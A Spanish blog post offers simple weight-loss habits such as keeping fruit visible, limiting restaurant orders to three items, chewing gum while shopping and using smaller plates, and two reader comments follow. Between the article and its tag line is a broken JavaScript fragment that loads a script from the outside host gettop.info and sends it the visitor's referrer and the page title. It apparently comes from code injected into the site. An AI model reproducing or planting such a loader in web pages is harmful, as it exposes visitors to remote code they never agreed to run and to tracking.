Salud y belleza » Dieta, Salud, alimentos

Hábitos que te ayudarán a perder peso sin necesidad de dietas

2 Comentarios

A veces con pequeños cambios que hagamos en nuestros hábitos diarios es suficiente para provocar una reacción en nuestro cuerpo. Si lo que quieres es perder peso, antes de empezar con dietas drásticas y sinsentidos te vamos a desvelar algunos hábitos y pequeñas acciones que te ayudarán a perder peso sin que te des apenas cuenta y sin tener que recurrir a dietas milagrosas.

El mundo entero propicia que comamos mucho y mal. La comida rápida, las máquinas expendedoras en los trabajos e incluso el menú del día es perjudicial para nuestra salud alimentaria. Sigue estos trucos y con un poco de fuerza de voluntad seguro que consigues perder peso:

- Pon a la vista el frutero lleno de fruta en la cocina: tenerlo a la vista evitará que busques otra comida cuando se te abra el apetito. Para comer entre horas lo mejor es una fruta antes que el pan o las patatas fritas.

frutero-cocina

- En el restaurante, pide solo tres cosas: el menú del día, aunque pueda parecer más económico y más sano, es el peor amigo de tu figura. Por eso hay una fórmula que consigue que no nos excedamos cuando comemos fuera: pedir solo tres cosas (aquí va incluida la comida, bebida y el postre, así que debes elegir). Puedes escoger, por ejemplo, un plato principal, bebida y postre u optar por un plato principal, pan y bebida… haz tu propia combinación pero que no sean más de 3 cosas.

- Cuidado en el supermercado: hacer la compra con hambre es lo peor que puedes hacer si quieres perder peso. Un buen truco para evitar comprar cosas que no necesitas o que no son saludables es ir a comprar mascando un chicle sin azúcar, esto hará que compremos un 7% menos de comida basura.

trucos-hacer-la-compra

- No comas en la mesa de trabajo: come mejor en una mesa aparte, tranquilo y lejos de máquinas expendedoras. También puedes proponer a tu empresa que ofrezca fruta gratis en las zonas de descanso, una costumbre estadounidense que no nos vendría mal copiar.

- Usa platos más pequeños: si usas platos más pequeños comerás por porciones más pequeñas y así evitarás servirte más cuando ya estás saciado.

comer-platos-pequeños

¿Crees que estos hábitos te pueden ayudar a perder peso?

} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

2 Comments »

  • mickey said:

    es importante tener fruta siempre en la casa a la vista, tanto para los adultos como para los niños, creo que hace falta ese incentivo para que comamos fruta y no otras porquerías.

  • sonia said:

    lo de ir con hambre a comprar es lo peor al final acabas llegando a casa con un montón de productos que no te hacían falta.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.